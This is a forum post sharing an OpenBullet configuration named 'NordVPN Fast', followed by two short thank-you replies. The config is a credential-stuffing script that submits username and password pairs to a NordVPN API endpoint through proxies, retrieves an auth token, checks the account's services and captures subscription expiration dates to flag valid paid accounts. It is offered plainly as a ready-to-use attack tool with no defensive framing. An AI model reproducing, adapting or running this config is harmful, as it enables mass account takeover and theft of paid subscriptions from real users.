Sign in to follow this  
solo@

NordVPN config OpenBullet

Recommended Posts

[hide]

[sETTINGS]

{

  "Name": "NordVPN Fast",

  "SuggestedBots": 1,

  "LastModified": "2019-04-02T14:42:27.4523923+05:30",

  "AdditionalInfo": "",

  "Author": "SATAN666",

  "Version": "1.0.0",

  "IgnoreResponseErrors": false,

  "NeedsProxies": true,

  "OnlySocks": false,

  "OnlySsl": false,

  "MaxProxyUses": 0,

  "AllowedWordlist1": "",

  "AllowedWordlist2": "",

  "DataRules": [],

  "CustomInputs": [],

  "ForceHeadless": false,

  "AlwaysOpen": false,

  "AlwaysQuit": false,

  "DisableNotifications": false,

  "CustomUserAgent": "",

  "RandomUA": false,

  "CustomCMDArgs": ""

}

 

[sCRIPT]

REQUEST POST "https://zwyr157wwiu6eior.com/v1/users/tokens"

  CONTENT "username=&password="

  CONTENTTYPE "application/x-www-form-urlencoded"

  HEADER "User-Agent: NordApp android (playstore/2.8.6) Android 9.0.0"

  HEADER "Pragma: no-cache"

  HEADER "Accept: */*"

KEYCHECK BanOnToCheck=FALSE

  KEYCHAIN Failure OR

    KEY "Unauthorized"

  KEYCHAIN Retry OR

    KEY "502: Bad gateway"

PARSE "

" LR "\"token\":\"" "\"" -> VAR "TOKEN"

FUNCTION Base64Encode "token:" -> VAR "ENCTOKEN"

REQUEST GET "https://zwyr157wwiu6eior.com/v1/users/services"

 

  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36"

  HEADER "Pragma: no-cache"

  HEADER "Accept: */*"

  HEADER "Authorization: Basic "

KEYCHECK

  KEYCHAIN Success OR

    KEY "created_at"

  KEYCHAIN Failure OR

    KEY "[]"

PARSE "

" LR "\",\"expires_at\":\"" "\"" -> VAR "EXPIRATION"

FUNCTION DateToUnixTime "" -> VAR "Unix"

FUNCTION CurrentUnixTime -> VAR "Current"

EXECUTEJS "var acct=Unix; var currt=Current; var comp=(acct>currt)?\"true\":\"false\"; "

KEYCHECK

  KEYCHAIN Custom "CUSTOM" OR

    KEY "false"

    KEY "2001-01-01"

PARSE "

" LR "\",\"expires_at\":\"" "\"" -> CAP "Expiration Date"

 

 

 

 

[/hide]

Share this post


Link to post
Share on other sites

MERCIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII

Share this post


Link to post
Share on other sites

No one gave you a like for your hard work bud, So I made sure i left one for you. Thank you for your hard work.

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Sign in to follow this